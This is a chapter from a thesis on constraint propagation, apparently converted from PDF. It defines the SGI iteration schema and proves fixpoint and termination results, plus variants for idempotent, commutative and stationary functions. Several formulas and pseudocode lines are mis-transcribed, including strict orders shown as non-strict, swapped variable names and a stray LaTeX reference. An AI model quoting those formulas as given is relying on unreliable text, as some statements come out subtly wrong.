In the remainder of the first part of our thesis, we shall gradually zoom on constraint propagation. Under this name gathers a number of mainly polynomial-time algorithms; each of these iteratively remove certain inconsistencies from CSPs, thereby attempting to limit the combinatorial explosion of the solution search space. More interestingly, all these algorithms avoid backtracking: at each iteration, a constraint propagation algorithm may remove values from CSPs, but never add them back in subsequent iterations.
Constraint propagation algorithms are known in the literature under other various names: filtering, narrowing, local consistency (which is, for some authors, a more specific notion), constraint enforcing, constraint inference, Waltz algorithms, incomplete constraint solvers, reasoners. However, here and in the remainder of this thesis, we adopt the most popular name, and always refer to them as constraint propagation algorithms.
In [Apt00a], the author states that "the attempts of finding general principles behind the constraint propagation algorithms repeatedly reoccur in the literature on constraint satisfaction problems spanning the last twenty years".
On a larger scale, the search for general principles is a common drive, shared by theoretical scientists of diverse disciplines: a series of methods to solve certain problems are devised; in turn, at a certain stage, this process calls for a uniform and general view if a common pattern can be envisaged. For instance, think of polynomial equations. Until the fifteenth century, algebra was a mere collection of stratagems for solving only numerical equations; these were expressed in words, and the account of the various solving methods was, sometimes, pure literature*. It was Viète in his *Opera Arithmetica* (1646) to introduce the use of vowels
---
* Cf. "La 'grande arte': l'algebra nel Rinascimento". U. Bottazzini, in Storia della scienza
27
for unknown values; this simplified notation paved the way to a general theory of polynomial equations and solving methods, no more restricted to numerical equations.
In this chapter, we propose a simple theory for describing constraint propagation algorithms by means of function iterations; the aim is to give a more general view on constraint propagation, based on functions and their iterations. It is well known that partial functions can be used for the semantics of deterministic programs; for instance, see [Jon97, LP81, Pap94]. The primary objective of our theorisation thus becomes that of tackling the following issues:
- abstracting which functions perform the task of pruning or propagation of inconsistencies in constraint propagation algorithms,
- describing and analysing how the pruning and propagation process is carried through by constraint propagation algorithms.
In this chapter, we mainly focus on the latter item, that is on how functions remove certain inconsistencies from CSPs and propagate the effects of this pruning. The basic theory, proposed in this chapter, will provide a uniform reading of a number of constraint propagation algorithms. Then, in Chapter 6, only after describing and analysing those algorithms in Chapters 4 and 5 via that theory, we specify which functions are traced in their study.
### 3.1.2 Outline
The topic of this chapter is a basic theory of iterations of functions for constraint propagation algorithms.
We first characterise iterations of functions (see Section 3.2) and then introduce the basic algorithm schema that iterates them by following a certain strategy (see Section 3.3). Thus, in the remainder of this chapter, we investigate some properties of the proposed algorithm schema by studying those of the iterated functions and the iterations themselves, see Section 3.4. For example, idempotency of functions will be related to fruitless loops, in terms of pruning, that can be thereby cut off. In turn, this property of functions will be traced in some specific constraint propagation algorithms in which it is used to avoid redundant computations, see Chapter 4.
On the one hand, the proposed algorithm schema is sufficient for describing many constraint propagation algorithms in terms of functions on a generic set, see Subsection 3.3.1, or on an equivalent set, see Subsection 3.4.3. On the other hand, a partial order on the function domain provides a sharper tool for analysing and studying the behaviour of these algorithms, loosely speaking. More precisely, a partial order on the function domain gives us a means to partially order the
possible computations of algorithms, see Subsection 3.3.2. Thereby, by means of
the domain order, we can pose and answer the following sort of questions about
the behaviour of constraint propagation algorithms.
- Can the order of constraint propagation affect the result?
- Or is the output problem independent of the specific order in which con-
straint propagation is performed (see Theorem 3.3.8)?
- Do constraint propagation algorithms always terminate?
- Or what is sufficient to guarantee their termination (see Theorem 3.3.9 and
Corollary 3.3.10)?
In all the analysed cases in Chapter 4, functions for constraint propagation al-
gorithms turn out to be inflationary with respect to a suitable partial order on
their domain, see p. 32. This property of functions also accounts for the absence
of backtracking in constraint propagation algorithms: pruning of values is never
resumed, since every execution of a constraint propagation algorithm always pro-
ceeds along an order.
Other properties of functions, related to the order, can be further used to
prune branches from the algorithm search tree; we shall study this issue in Sub-
section 3.4.2. For instance, a property that we call stationarity will be introduced
as a stronger form of idempotency; hence functions that enjoy it need to occur at
most once in any execution of the algorithm schema.
3.1.3 Structure
First, we introduce iterations of functions in Section 3.2, and the basic schema
to iterate them in Section 3.3. Variations of the basic schema, along with the
related properties of functions, are treated in details in Section 3.4. Finally, we
summarise and discuss the results of this chapter in Section 3.5.
3.2 Iterations of Functions
Given a finite set $F$ of functions $f : O \mapsto O$ over a set $O$, we define a sequence
$(o_n : n \in \mathbb{N})$ with values in $O$ as follows:
1. $o_0 := \bot$, where $\bot$ is a selected element of $O$;
2. $o_{n+1} := f(o_n)$, for some $f \in F$.
Each sequence $(o_n : n \in \mathbb{N})$ is called an iteration of $F$ functions (based on $\bot$).
An iteration of $F$ functions $(o_n : n \in \mathbb{N})$ stabilises at $o_n$ if $o_{n+k} = o_n$ for every
$k \geq 0$.
In this chapter, we shall mainly be concerned with iterations of $F$ functions that stabilise at some specific points: in fact, we shall be interested in iterations that stabilise at a common fixpoint of all the functions: namely, an element $o \in O$ such that
$$f(o) = o \text{ for all } f \in F.$$
Indeed, it is not sufficient for an iteration to stabilise at $o$ for this to be a common fixpoint of all the $F$ functions, as the following simple example illustrates.
**Example 3.2.1.** Consider $O := \{0, 1, 2\}$ and the set $F$ with the following two functions:
$$f(0) := 0, f(1) := 2 \text{ and } f(2) := 2,$$
$$g(0) := 1, g(1) := 1 \text{ and } g(2) := 2.$$
Now, consider the iteration $(o_n : n \in \mathbb{N})$ based on $0$ such that $o_{n+1} := f(o_n)$ for every $n \in \mathbb{N}$. Indeed, the iteration stabilises at $0$; but this is not a fixpoint of $g$ since $g(0) \neq 0$.
In the above Example 3.2.1, the function $g$ is never selected. Would it be sufficient to choose $g$ after $f$ to guarantee that $o$ is a common fixpoint of the $F$ functions? Certainly not: define first $o_1 := f(o_0) = 0$, then $o_{j+1} := g(o_j)$ for $j > 0$. This iteration stabilises at $1$ and not at $2$, which is the only common fixpoint of the two functions $f$ and $g$. We can repeat the above trick infinitely many times, one for every $k > 0$: in fact, it is sufficient to set $o_{i+1} := f(o_i)$ for $0 \leq i < k$, and $o_{j+1} := g(o_j)$ for $j \geq k$; still the resulting iteration stabilises at $1$. How can we remedy this? The answer is given below, by the algorithm schema in Section 3.3: this is designed to compute a common fixpoint of finitely many functions.
### 3.3 The Basic Iteration Schema
The Structured Generic Iteration algorithm, briefly SGI, is a slightly more general version of the Generic Iteration algorithm of [Apt00a]. Both of them aim at computing a common fixpoint of finitely many functions, simply by iterating them until such a fixpoint is computed. The SGI algorithm is more general in that its first execution can start with a subset of all the given functions; then these are introduced, *only if necessary*, in subsequent iterations. So SGI covers more algorithms than the Generic Iteration algorithm does.
The SGI algorithm is displayed as Algorithm 3.3.1. Its parameters are characterised as follows.
**Convention 3.3.1 (SGI).**
- $F$ is a finite set of functions, all defined on the same set $O$;
3.3. The Basic Iteration Schema
- \( \bot \) is an element of \( O \);
- \( F_\bot \) is a subset of \( F \) that enjoys the following property: every \( F \) function \( f \) such that \( f(\bot) \neq \bot \) belongs to \( F_\bot \);
- \( G \) is a subset of \( F \) functions;
- \( \text{update} \) instantiates \( G \) to a subset of \( F \).
**Algorithm 3.3.1: SGI(\( \bot, F_\bot, F \))**
\[
\begin{align*}
o &:= \bot; \\
G &:= F_\bot; \\
\text{while } G \neq \emptyset \text{ do} & \\
& \quad \text{choose } g \in G; \\
& \quad G := G - \{g\}; \\
& \quad o' := g(o); \\
& \quad \text{if } o' \neq o \text{ then} \\
& \quad \quad G := G \cup \text{update}(G, F, g, o); \\
& \quad o := o'
\end{align*}
\]
As we shall see below, the \( \text{update} \) operator returns a subset of \( F \) according to the functions in \( G \), the current \( O \) value \( o \) and \( F \) function \( g \); its computation can be expensive, unless some information on the chosen function \( g \) and input value \( o \) is provided that can help to compute the \( F \) functions returned by \( \text{update} \), as we shall see in Chapter 4. Besides, in the SGI schema below, the function \( g \) is chosen non deterministically; no strategy for choosing \( g \) is imposed in this schema; but this is done on purpose, since SGI aims at being a general template for a number of CSP algorithms. Indeed, the complexity of the algorithm will vary according to the way in which the \( \text{update} \) operator will be specified and the function \( g \) chosen.
### 3.3.1 The basic theory of SGI
The SGI algorithm is devised to compute a common fixpoint of the \( F \) functions: i.e., an element \( o \in O \) such that \( f(o) = o \) for every \( f \in F \). Suppose that the following predicate
\[
\forall f \in F - G \ f(o) = o \quad \text{(Inv)}
\]
is an invariant of the while loop of the SGI algorithm. If \( o \) is the last input of a terminating execution of SGI, then \( G \) is the empty set and the predicate \( \text{Inv} \) above implies that \( o \) is a common fixpoint of all the \( F \) functions. We restate this as the following fact, which is used over and over in the remainder of this chapter.
FACT 3.3.1 (COMMON FIXPOINT). Suppose that the above predicate Inv is an invariant of the while loop of SGI. If \( o \) is the last input of a terminating execution of SGI, then \( o \) is a common fixpoint of the \( F \) functions. \( \square \)
Common fixpoint
The Common Fixpoint Fact 3.3.1 above suggests a simple, yet sufficient condition for SGI to compute a common fixpoint of the \( F \) functions: after an iteration of the while loop, we only need to keep, in \( G \), the functions for which the input value of the while loop is not a fixpoint. As for this, it is sufficient that the update operator in SGI satisfies the following axiom.
AXIOM 3.3.1 (COMMON FIXPOINT). Let \( o' := g(o) \) for \( g \in F \), and \( \text{Id}(g, o') := \{g\} \) if \( g(o') \neq o' \), else \( \text{Id}(g, o') \) is the empty set. If \( o' \neq o \), then
\[
\text{update}(G, F, g, o) \supseteq \{ f \in (F - G) : f(o) = o \text{ and } f(o') \neq o' \} \cup \text{Id}(g, o');
\]
otherwise \( \text{update}(G, F, g, o) \) is the empty set.
In other words, the update operator adds to \( G \) at least all the \( F \) functions, not already in \( G \), for which \( o \) is a fixpoint and the new value \( o' \) is not; besides, \( g \) has to be added back to \( G \) if \( g(o') \neq o' \).
LEMMA 3.3.2 (INVARIANCE). Let us assume the Common Fixpoint Axiom 3.3.1. Then the Inv predicate on p. 31 is an invariant of the while loop of SGI.
PROOF. The base step follows from the definition of \( F \) (see Convention 3.3.1 above), and the induction step is easily proved by means of the Common Fixpoint Axiom 3.3.1. \( \square \)
The above Common Fixpoint Fact 3.3.1 and Invariance Lemma 3.3.2 immediately imply the following theorem.
THEOREM 3.3.3 (COMMON FIXPOINT). Let us assume the Common Fixpoint Axiom 3.3.1. If \( o \) is the last input of a terminating execution of the SGI algorithm, then \( o \) is a common fixpoint of all the \( F \) functions. \( \square \)
EXAMPLE 3.3.4. Let us consider Example 3.2.1 as input to SGI so that \( \bot := 0 \). First, assume \( F \bot := \{g\} \). In the first while loop, only \( g \) can be chosen and applied; so, after the loop, \( v \) is set equal to 1. In the same loop, update adds \( f \) to \( G \) and \( g \) is removed from \( G \). So, at the end of the first loop, \( G = \{f\} \) and \( o = 1 \). Then \( f \) is chosen and applied to 1, \( o \) is set equal to 2 and \( G \) to the empty set at the end of the loop. So SGI terminates by computing 2, a common fixpoint of the
two functions. Instead, if $F_\bot$ is instantiated to the whole set $F := \{ f, g \}$, there are two possible executions of SGI, both terminating with 2. Note that, given Convention 3.3.1 and Axiom 3.3.1, there are three different executions of the SGI algorithm with $F := \{ f, g \}$ and $\bot := 0$.
### SGI iterations
We started this chapter with generic iterations of functions, and provided a schema that computes a common fixpoint of finitely many functions. Hereby we show how function iterations and the SGI schema are related. First of all, let us denote by $id$ the identity function on the domain of the iterated functions of $F$; indeed all the common fixpoints of the $F$ functions are, trivially, fixpoint of $id$. Then every execution of SGI gives rise to an iteration of the $F \cup \{ id \}$ functions. To explain how, we first introduce traces of SGI executions.
Consider an execution of the SGI algorithm — see Algorithm 3.3.1. The SGI trace $\langle (o_n, G_n) : n \in \mathbb{N} \rangle$ of the execution is defined as follows:
- $o_0 := \bot, G_0 := F_\bot$;
- suppose that $o_n$ and $G_n$ are the input of the $n$-th while loop of SGI. If $G_n$ is the empty set, then $o_{n+1} := id(o_n)$ and $G_{n+1} := \emptyset$. Otherwise, let $g$ be the chosen function and set $o_{n+1}$ equal to $g(o_n)$. Then we define $G_{n+1}$ as the set $(G_n - \{ g \}) \cup \text{update}(G_n, F, o, o_n)$ if $o_{n+1} \neq o_n$, else as the set $G_n - \{ g \}$.
Then $\langle o_n : n \in \mathbb{N} \rangle$ is an SGI iteration of the $F$ functions.
**Example 3.3.5.** Let us revisit Example 3.3.4. There we have the following three SGI traces:
1. $(\langle 0, \{ g \} \rangle, (1, \{ f \}), (2, \emptyset), \ldots)$;
2. $(\langle 0, \{ f, g \} \rangle, (0, \{ g \}), (1, \{ f \}), (2, \emptyset), \ldots)$;
3. $(\langle 0, \{ f, g \} \rangle, (1, \{ f \}), (2, \emptyset), \ldots)$.
The first trace corresponds to the SGI instantiation with $F_\bot := \{ g \}$; whereas the SGI instantiation related to the second and third traces is for $F_\bot := \{ f, g \}$.
Traces provide another tool to formulate and study properties of SGI, like termination. We shall say that the trace $\langle (o_n, G_n) : n \in \mathbb{N} \rangle$ stabilises at $o_k$ iff the iteration $\langle o_n : n \in \mathbb{N} \rangle$ does so and $G_k = \emptyset$. Now, the termination condition for the while loop in SGI is that $G$ must be empty; the last input $o$ of a terminating execution of SGI is the value computed by SGI. Hence it is easy to check that the following statements are equivalent:
1. the SGI algorithm terminates by computing $o$;
2. the SGI trace stabilizes at $o_k = o$.
We reformulate this equivalence as the following fact, as it will allow us to switch from executions of SGI to traces, and vice versa, when dealing with the termination of SGI.
**Fact 3.3.6.** An execution of the SGI algorithm terminates by computing $o$ iff the associated trace stabilizes at $o$.
### 3.3.2 Ordering Iterations
Suppose that we can define a partial order $\sqsubseteq$ over the set $O$. Then this can be used to order iterations.
#### Least common fixpoint
Suppose that the $F$ functions are monotone with respect to a partial order $\sqsubseteq$ on $O$; namely, for every $f \in F$,
$$ o \sqsubseteq o' \implies f(o) \sqsubseteq f(o'). $$
Then we can prove that the common fixpoints of the $F$ functions, as computed by SGI, coincide with the least fixpoint of the $F$ functions. So let us assume the following statement.
**Axiom 3.3.2 (Least Fixpoint).**
(i). The structure $\langle O, \sqsubseteq, \bot \rangle$ is a partial ordering with bottom $\bot \in O$.
(ii). The $F$ functions are all monotone with respect to $\sqsubseteq$.
Given the above axiom, we have the following lemma as in [Apt00a].
**Lemma 3.3.7 (Stabilisation).** Assume the Common Fixpoint Axiom 3.3.1 and the Least Fixpoint Axiom 3.3.2. Consider a fixpoint $w$ of the $F$ functions. Let $\langle o_i : i \in \mathbb{N} \rangle$ be a generic iteration of $F$ that satisfies the following properties:
- $o_0 := \bot$;
- $o_{i+1} := g(o_i)$, for some $g \in F$.
Then $o_i \sqsubseteq w$, for every $f \in F$ and $o_i$ in the iteration $\langle o_i : i \in \mathbb{N} \rangle$.
**Proof.** The proof is by induction on $i \in \mathbb{N}$. The base case is trivial since $\bot$ is the bottom of the ordering. As for the induction step, let us assume that $o_i \sqsubseteq w$. Thus, we invoke monotonicity (see Axiom 3.3.2) and obtain $o_{i+1} := g(o_i) \sqsubseteq w$.
The above lemma shows how a partial ordering can be used to compare computations of SGI with functions on the ordering, and highlights the role of monotonicity in the following result, which follows from the lemma and Theorem 3.3.3.
3.3. The Basic Iteration Schema
**Theorem 3.3.8 (Least Fixpoint).** Let $F$ be a finite set of functions over $O$, and assume the Common Fixpoint Axiom 3.3.1 and the Least Fixpoint Axiom 3.3.2. Then all the terminating executions of SGI compute the same value: i.e., the least common fixpoint of all the $F$ functions with respect to the partial order on $O$. □
**Termination**
From this point onwards, let us write $o \sqsubseteq o'$ whenever $o \sqsubseteq o'$ and $o \neq o'$. A $\sqsubseteq$-chain in $O$ is any subset of $O$, that is totally ordered by $\sqsubseteq$.
In order to ensure the termination of SGI, for any input, we must ascertain that every SGI iteration stabilises. If all the $F$ functions are computable, every SGI iteration is totally ordered by $\sqsubseteq$, and all $\sqsubseteq$-chains are finite, then we can guarantee termination. The following axiom formalises these ideas.
**Axiom 3.3.3 (Termination).**
- Each $f \in F$ is a computable function over a partial ordering with bottom $O := (O, \sqsubseteq, \bot)$.
- The $F$ functions are inflationary with respect to the partial order: namely, $o \sqsubseteq f(o)$ for every $o \in O$ and $f \in F$.
- The ordering $(O, \sqsubseteq)$ satisfies the ascending chain condition (ACC), i.e. each $\sqsubseteq$-chain in $O$ is finite.
Now, given the above axiom, we can prove the following termination result.
**Theorem 3.3.9 (Termination 1).** Assume the Common Fixpoint Axiom 3.3.1 and the Termination Axiom 3.3.3. Then SGI always terminates, by computing a common fixpoint of the $F$ function.
**Proof.** At each iteration of the while loop, either $o \sqsubseteq o'$ — due to inflationarity, see Axiom 3.3.3 — or $g$ is removed from $G$. Axiom 3.3.3 yields that all $\sqsubseteq$-chains are finite; since $G \sqsubseteq F$ is finite too, the algorithm terminates. □
Notice that every finite partial ordering satisfies the ACC in Axiom 3.3.3; moreover, every function on a finite set is computable. Thus we draw the following conclusion as a corollary of Theorem 3.3.9.
**Corollary 3.3.10 (Termination 2).** Let us assume the Common Fixpoint Axiom 3.3.1 and that the $F$ functions are defined on a finite partial ordering with bottom $(O, \sqsubseteq, \bot)$. Suppose that the $F$ functions are inflationary with respect to $\sqsubseteq$. Then every execution of SGI terminates. □
**Note 3.3.11.** Many algorithms for CSPs deal with finite domains. Whenever those algorithms are instances of SGI, the above Corollary 3.3.10 will ensure that
a simple condition on the iterated functions is sufficient to guarantee the termination of the instance algorithms. However, functions for non-standard CSPs as in Chapter 5, often, have infinite domains; then Corollary 3.3.10 will not be of help, and we shall need to resort to the above Theorem 3.3.9.
### 3.3.3 Finale
The main results concerning the basic SGI algorithm schema are collected in the following corollary; this gathers Theorems 3.3.3, 3.3.8, 3.3.9 and Corollary 3.3.10. Figure 3.3.3 depicts a search tree of SGI, under the assumptions of either one of the statements in the following corollary.
**Corollary 3.3.12.**
(i). Assume the Common Fixpoint Axiom 3.3.1, the Least Fixpoint Axiom 3.3.2 and the Termination Axiom 3.3.3. Then every execution of SGI terminates by computing the least common fixpoint o of the iterated functions.
(ii). Assume the Common Fixpoint Axiom 3.3.1 and that the F functions are defined on a finite partial ordering with bottom \( (O, \sqsubseteq, \perp) \). Suppose that the F functions are all monotone and inflationary with respect to \( \sqsubseteq \). Then every execution of SGI terminates by computing the least common fixpoint o of the iterated functions. \( \square \)
---
**Figure 3.1:** SGI search tree.
3.4 Variations of the Basic Schema
3.4.1 The Generic Iteration Schema
We started Section 3.3 by claiming that SGI is a slightly more general version of the Generic Iteration (GI) algorithm of [Apt00a]. We shall also need to refer to the latter schema in Chapter 4, and hence we explain it in more details as below.
The difference between the two basic schemas is that the set of functions $G$ in GI is initialised to the whole set of functions $F$: i.e., $F_{1}$ is the whole set $F$. Therefore, we have the following results for GI as a consequence of Corollary 3.3.12.
**Theorem 3.4.1.**
(i) Assume the Common Fixpoint Axiom 3.3.1, the Least Fixpoint Axiom 3.3.2 and the Termination Axiom 3.3.3. Then GI always terminates by computing the least common fixpoint of the iterated functions.
(ii) Assume the Common Fixpoint Axiom 3.3.1 on update and that the $F$ functions are defined on a finite partial ordering with bottom $(O, \subseteq, \bot)$. Suppose that the $F$ functions are monotone and inflationary with respect to $\subseteq$. Then GI always terminates, computing the least common fixpoint of the iterated functions.$\Box$
3.4.2 Iterations Modulo Function Properties
The GI algorithm is a variation of SGI in that $G$ is differently initialised. Other variations of the basic schema SGI are obtained by optimising the instantiation of $G$ in the while loop via update: in SGI, all the functions for which the new computed value $d' = g(o)$ is not a fixpoint are added to $G$. Indeed, more functions are added to $G$, more executions of the while loop are needed. In the following, we study some properties of functions that allow us to reduce the number of executions of the while loop by an efficient instantiation of $G$ via update. Each property is studied separately and gives rise to a different version of the SGI schema; all these or their combinations will be used in Chapter 4.
**Idempotent functions**
Notice that the chosen function $g$ is removed from the set $G$ of iterated functions in SGI if the test $gg(o) = g(o)$ returns true. This is always true, independently of the specific value $o$, if $g$ is idempotent, as specified below.
**Definition 3.4.2.** A function $g : O \rightarrow O$ is idempotent if $gg(o) = g(o)$ for every $o \in O$.
As suggested above, an idempotent function can always be removed after being chosen. The following diagram shows what happens otherwise.
\[ o \rightarrow g(o) \rightarrow gg(o) \]
So any iteration as above can be equivalently reduced to one in which the second application of \( g \) is removed, if this function is idempotent; i.e., \( Id(g, o') \), as in the Common Fixpoint Algorithm ref axiom:sgi:1, is always set to the empty set for \( g \) idempotent. The following lemma is an immediate consequence of that axiom and Definition 3.4.2 above.
**Lemma 3.4.3 (Idempotency).** Consider a finite set \( F \) of idempotent functions on \( O \). Then
\[
\text{update}(G, F, g, o) \supseteq G \cup \{ f \in F - G : f(o) = o \text{ and } f(o') \neq o' \}
\]
satisfies the Common Fixpoint Axiom 3.3.1. \( \square \)
Let us call SGII the version of SGI with the update operator as in Lemma 3.4.3, where the second I stands in for Idempotent. Then the following theorem is a trivial consequence of that lemma and Corollary 3.3.12.
**Theorem 3.4.4.**
(i). Assume the Least Fixpoint Axiom 3.3.2 and the Termination Axiom 3.3.3. Then every execution of SGII terminates by computing the least common fixpoint of the iterated functions, if these are all idempotent.
(ii). Assume that the \( F \) functions are defined on a finite partial ordering with bottom \( (O, \sqsubseteq, \bot) \). Suppose that the \( F \) functions are all monotone and inflationary with respect to \( \sqsubseteq \). Then every execution of SGII terminates, computing the least common fixpoint of the iterated functions, if these are all idempotent. \( \square \)
**Commutative functions**
Commutativity of an operation is a useful property in computations: it means that the operation provides the same result regardless of permutations of the combined elements. Function composition is not, in general, a commutative operation. However there are classes of functions on which composition is commutative; thereby the order in which these functions are composed is irrelevant. The following definition aims at capturing precisely this, and it is a special case of the notion of centraliser of an element with respect to a given operation, like in group theory; see for instance [Her75].
3.4. Variations of the Basic Schema
**Definition 3.4.5.** Let $F$ be a set of functions over a set $O$, consider a function $g : O \mapsto O$, and the subset $\text{Comm}(F, g)$ of $F$ of all functions $f$ such that
$$fg(o) = gf(o), \text{ for all } o \in O.$$
Then the set $\text{Comm}(F, g)$ is the set of $F$ functions that *commute* with $g$.
As stated and proved in [Apt00a], commutativity can be exploited to reduce executions in the GI algorithm. This carries over to the SGI schema in the same manner.
**Lemma 3.4.6.** If the update operator satisfies the Common Fixpoint Axiom 3.3.1, then so does $\text{update}(G, F, g, o) - \text{Comm}(F, g)$.
**Proof.** Suppose that $fg(o) = gf(o)$; then $f(o) = o$ implies $gf(o) = g(o)$; thus $\text{update} - \text{Comm}$ satisfies the Common Fixpoint Axiom 3.3.1 if $\text{update}$ does. □
Let us rename SGI with Commutativity, briefly SGIc, the SGI algorithm with $\text{update} - \text{Comm}$ in place of $\text{update}$. The above Lemma 3.4.6 allows us to transfer, to SGIc, all the results concerning SGI as summarised in Corollary 3.3.12.
**Theorem 3.4.7.**
(i). Assume Assume the Common Fixpoint Axiom 3.3.1, the Least Fixpoint Axiom 3.3.2 and the Termination Axiom 3.3.3. Then SGIc always terminates by computing the least common fixpoint of the iterated functions.
(ii). Assume the Common Fixpoint Axiom 3.3.1 on update and that the $F$ functions are defined on a finite partial ordering with bottom $(O, \subseteq, \bot)$. Suppose that the $F$ functions are all monotone and inflationary with respect to $\subseteq$. Then SGIc always terminates, computing the least common fixpoint of the iterated functions. □
**Stationary functions**
While the properties of idempotency and commutativity do not rely on any partial order on the given set $O$, the following property does.
**Definition 3.4.8.** Let $f$ be an inflationary function, defined over a partial ordering $(O, \subseteq)$. Then the function $f$ is *stationary from* $o \in O$ and $o'$ if it enjoys the following property:
$$\text{if } f(o) \neq o, \; o \subseteq o' \text{ and } f(o') \subseteq o'' \text{ then } f(o'') = o''.$$
More in general, an inflationary function $f$ is *stationary* if there exist $o, o' \in O$ such that $f$ is stationary from them.
In other words: consider a totally ordered iteration and suppose that a stationary function $f$ is known to affect a value $o$ in it; after the first application of $f$ to $o$ or a subsequent value $o'$ in the iteration, $f$ does not change any value that follows in the iteration. The following diagram shows schematically what happens whenever a stationary function $f$ is applied again, after $f$ modifies a value in the iteration.
In brief, the iteration in the above diagram can equivalently be reduced to one in which the second application of $f$ is removed, if this function is stationary. The below lemma states precisely that stationary functions can be added at most once to $G$, namely the set of functions to iterate.
In order to formulate the lemma properly, we resort to traces and state the following axiom.
**Axiom 3.4.1 (stationarity).**
(i) The $F$ functions are all stationary on $\langle O, \sqsubseteq, \bot \rangle$ and, if $f \in F_\bot$ and $f(\bot) = \bot$, then $f$ is the identity on $O$.
(ii) If $\langle (o_n, G_n) : n \in \mathbb{N} \rangle$ is the trace of an execution of $SGI$, $G_n$ denotes the set of $G$ functions at the $n$-th while loop of $SGI$; then put
$$update(G_n, F, g, o_n) := \left\{ f \in F - \bigcup_{k \leq n} G_k : f(o_n) = o_n, f(o_{n+1}) \neq o_{n+1} \right\};$$
this for every $n$.
Now we can formulate the following Stationarity Lemma: there we assume that the $F$ functions are idempotent, since this simplifies the proof, even tough the extension to the non-idempotent case is possible.
**Lemma 3.4.9 (stationarity).** Assume the Stationarity Axiom 3.4.1 and that all the $F$ functions are idempotent. Then $update$ satisfies the Common Fixpoint Axiom 3.3.1.
**Proof.** We only need to prove that, if $f \in \bigcup_{k<n} G_k$ and $f \notin G_n$, then $f(o_{n+1}) = o_{n+1}$. If $f \in F_\bot$ and $f(\bot) = \bot$, then $f(o_{n+1}) = o_{n+1}$ by Axiom 3.4.1. Else, there must be $o_i$ in the iteration such that $i < n$ and $f(o_i) \neq o_i$, due to Axiom 3.4.1 again. Since $f \notin G_n$, then there exists $i \leq j < n$ and $o_j$ in the iteration such that $o_{j+1} = f(o_j)$. Therefore, inflationarity yields the following:
$$o_i \sqsubseteq o_j \text{ and } f(o_j) = o_{j+1} \sqsubseteq o_n \sqsubset o_{n+1}.$$
3.4. Variations of the Basic Schema
Thus we can conclude that \( o_i \neq f(o_i), o_i \sqsubseteq o_j \) and \( f(o_j) \sqsubseteq o_{n+1} \) hold. Then Definition 3.4.8 yields \( f(o_{n+1}) = o_{n+1} \).
In Chapter 4, we make an extensive use of the variation of the SGI algorithm with stationary and idempotent functions. So we rewrite SGI with Stationary and Idempotent functions as the SGIIS Algorithm 3.4.1.
Algorithm 3.4.1: SGIIS(\( \perp, F_\perp, F \))
\[
\begin{align*}
v & := \perp; \\
g & := \emptyset; \\
\text{while } F_\perp \neq \emptyset \text{ do} \\
& \quad \text{choose } g \in F_\perp; \\
& \quad F_\perp := F_\perp - \{g\}; \\
& \quad o' := g(o); \\
& \quad \text{if } o' \neq o \text{ then} \\
& \quad \quad G := G \cup \text{update}(G, F, g, o); \\
& \quad \quad F := F - \text{update}(G, F, g, o); \\
& \quad \quad o := o'; \\
& \quad \text{while } G \neq \emptyset \text{ do} \\
& \quad \quad \text{choose } g \in G; \\
& \quad \quad G := G - \{g\}; \\
& \quad \quad o' := g(o); \\
& \quad \quad \text{if } o' \neq o \text{ then} \\
& \quad \quad \quad G := G \cup \text{update}(G, F, g, o); \\
& \quad \quad \quad F := F - \text{update}(G, F, g, o); \\
& \quad \quad \quad o := o';
\end{align*}
\]
The Stationarity Lemma 3.4.9 and the Idempotency Lemma 3.4.3 allow us to transfer, to SGIIS, all the results concerning SGI as summarised in Corollary 3.3.12.
**Theorem 3.4.10.**
(i). Assume the Stationarity Axiom 3.4.1, the Least Fixpoint Axiom 3.3.2 and the Termination Axiom 3.3.3. Then every execution of SGIS terminates by computing the least common fixpoint of the iterated functions.
(ii). Assume the Stationarity Axiom 3.4.1, the Least Fixpoint Axiom 3.3.2, and that the \( F \) functions are defined on a finite partial ordering with bottom \( \{O, \sqsubseteq, \perp\} \). Then every execution of SGIS terminates by computing the least common fixpoint of the iterated functions. \( \square \)
3.4.3 Iterations Modulo Equivalence
The SGI algorithm with Equivalence (SGIE) is SGI with functions defined on an equivalence structure \((V, \equiv)\), and such that the if conditional depends on the equivalence of the input and output values, and not necessarily their identity; see Algorithm 3.4.2. Like for SGI, the update operator selects and returns functions of \(F\). Thus this algorithm iterates functions from a set \(F\) until a value \(v\) is found for which \(g^V(v) \equiv v\). Indeed, if the equivalence relation \(\equiv\) collapses into the identity, we have the SGI algorithm back.
Algorithm 3.4.2: SGIE(\(\bot, \equiv, F_\bot, F\))
\[
v := \bot^V; \\
G^V := F^V; \\
\textbf{while } G^V \neq \emptyset \textbf{ do} \\
\quad \text{choose } g^V \in G^V; \\
\quad G^V := G^V - \{g^V\}; \\
\quad v' := g^V(v); \\
\quad \textbf{if } v' \neq v \textbf{ then } G^V := G^V \cup \text{update}(F^V, g^V, v); \\
\quad v := v'; \\
\textbf{end while}
\]
**Note 3.4.11.** We let \(\text{update}(F^V, g^V, v)\) be an unspecified subset of \(G\). In fact, in the case of the SGIE algorithm schema, the update operator varies according to the instance CSP algorithms. However, as for the results in this part, we do not need to assume anything more of update that it is returns a subset of \(F\) functions.
**SGIE iterations**
As in the case of SGI, we associate SGIE traces with executions of an SGIE algorithm. Again, notice that the identity function \(id^V\) on \(V\) does not affect any value in any computation of SGIE; i.e., \(id^V(v) \equiv v\) for every \(v \in V\).
The SGIE traces \((v_n, G^V_n) : n \in \mathbb{N}\) of executions of the SGIE algorithm are defined like the SGI traces:
- \(v_0 := \bot_V, G^V_0 := F^V_\bot\):
- suppose that \(v_n\) and \(G^V_n\) are the input of the \(n\)-th while loop of SGIE. If \(G^V_n\) is the empty set, then \(v_{n+1} := v_n\) and \(G^V_{n+1} := \emptyset\). Otherwise, let \(g^V\) be the chosen function and set \(v_{n+1}\) equal to \(g^V(v_n)\). Then the set \(G^V_{n+1}\) is defined as \(G^V_n - \{g^V\} \cup \text{update}(F^V, G^V_n, g^V, v_n)\) if \(v_{n+1} \neq v_n\), otherwise as the set \(G^V_n - \{g^V\}\).
3.4. Variations of the Basic Schema
The iteration \( \langle v_n : n \in \mathbb{N} \rangle \) is called an SGI \( \text{iteration} \) of SGI.
As in the case of SGI, traces are useful to formulate and study termination conditions on SGI. So we shall say that the SGI \( \text{trace} \) stabilises at \( v_n \) if the iteration \( \langle v_n : n \in \mathbb{N} \rangle \) does so and \( G_n^V = \emptyset \). The following equivalence will be useful in the below part.
**Fact 3.4.12.** An iteration of an SGI algorithm terminates by computing \( v \) iff the associated trace stabilises at \( v \).
The least \( \equiv \)-class and termination
